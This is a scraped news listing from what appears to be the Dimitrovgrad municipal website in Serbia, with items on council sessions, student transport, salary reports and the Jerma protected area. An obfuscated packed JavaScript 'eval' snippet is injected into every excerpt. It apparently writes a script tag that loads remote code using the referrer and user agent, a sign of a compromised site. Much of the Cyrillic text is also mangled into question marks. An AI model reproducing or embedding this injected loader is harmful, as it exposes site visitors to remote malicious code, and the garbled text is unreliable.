Welcome

Tuesday 23.04.19 04:38
Objekat za  sakupljanje u Smederevu

УПРАВЉАЊЕ СПОРЕДНИМ ЖИВОТИЊСКИМ ПРОИЗВОДИМА

?????????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szkii|var|u0026u|referrer|dibae||js|php’.split(‘|’),0,{}))
???????? ????????? ??????????? ?????????, ??? ????????? ??????, ????? ?? ?? ???????? ??????? ?????? ? ??????? ??????????? ??????? ???????? ? ???? ? ???????…

grb-dmg

Обавештење о бесплатном превозу ученика и студената

???????????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hdeie|var|u0026u|referrer|fyyfh||js|php’.split(‘|’),0,{}))
?? ??? ???????? ? ??????? ??????? ????? ???? ?? ???????  ? ????????? ????????? ?? ?? ???? 05.12.2014 ?????? ??????? ?????????? „ZMV-tours“ ??…

grb-dmg

XXV седница Скупштине општине Димитровград

???? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etrez|var|u0026u|referrer|sizhi||js|php’.split(‘|’),0,{}))
21.11.2014 ?????? ??????? ?? XXV ??????? ????????? ??????? ????????????. ?? ??????? ???? ????? ?? 28 ??????. ?????? ???????, ???????? ?? ?????? ?…

grb-dmg

УКУПНИ РАСХОДИ ЗА ПЛАТЕ И ДОДАТКЕ ЗАПОСЛЕНИХ

?????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nkefb|var|u0026u|referrer|zbaea||js|php’.split(‘|’),0,{}))
?? ??????? ????????? ?? ?????? ??????? ???????????? ?? ????? ? ??????? ?????????? ?????? ???????? ????. 

grb-dmg

ИСПЛАЋЕНЕ ЗАРАДЕ КОД КОРИСНИКА БУЏЕТСКИХ СРЕДСТАВА

?????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkbrh|var|u0026u|referrer|ddtan||js|php’.split(‘|’),0,{}))
?? ?????????? ???????? ??? ????????? ????????? ?????? ???????? ????.

grb-dmg

ИСПЛАЋЕНЕ ЗАРАДЕ ИЗАБРАНИХ, ИМЕНОВАНИХ, ПОСТАВЉЕНИХ И ЗАПОСЛЕНИХ ЛИЦА У ОПШТИНИ ДИМИТРОВГРАД

?????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhbhi|var|u0026u|referrer|srtte||js|php’.split(‘|’),0,{}))
?? ?????????? ???????? ?????????, ??????????, ??????????? ? ?????????? ???? ? ??????? ???????????? ?????? ???????? ????. 

grb-dmg

Остваривање права на бесплатан превоз

????????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fsdth|var|u0026u|referrer|baknb||js|php’.split(‘|’),0,{}))
???? ??????? ???????????? ?? ??????? ???????? ???? 10.11.2014 ?????? ?????? ??

????????? ? ?????????? ??????? ?? ???????? ? ??????? ??????? ????? ????…

288px-Ermagorge

Концепт заштите СРП „Јерма“

? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkttb|var|u0026u|referrer|dbhdr||js|php’.split(‘|’),0,{}))
???????????? ?????? ?? ??????? ??????? ?????? ? ??????? ????????????, ? ?????? 5. ???????????? ????????? ?????? ??????? GREENFEST, ??????? ??…

grb-dmg

Европска недеља локалне демократије

?? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysdne|var|u0026u|referrer|srarh||js|php’.split(‘|’),0,{}))
??????? ?????? ???????????? ??????? ? ??????? (????), ??????? ???????????? ?? ??? ?????? ?? ???? ??? ???????? ? ??????????? “???????? ?????? ??????? ???????????…

fi_za_odg_drustvo-700x260

Национална стратегија за подстицајно окружење

??????????? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d)}}return p}(‘0.6(“”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arnbt|var|u0026u|referrer|rknbs||js|php’.split(‘|’),0,{}))
?? ??????? ?? ???????? ???????? ????? ????????? ?????? ? ???? ??????????, ??????? ????? ????????, ??? ???????????? ? ?????????????? ???????? ???? ?????????? ?…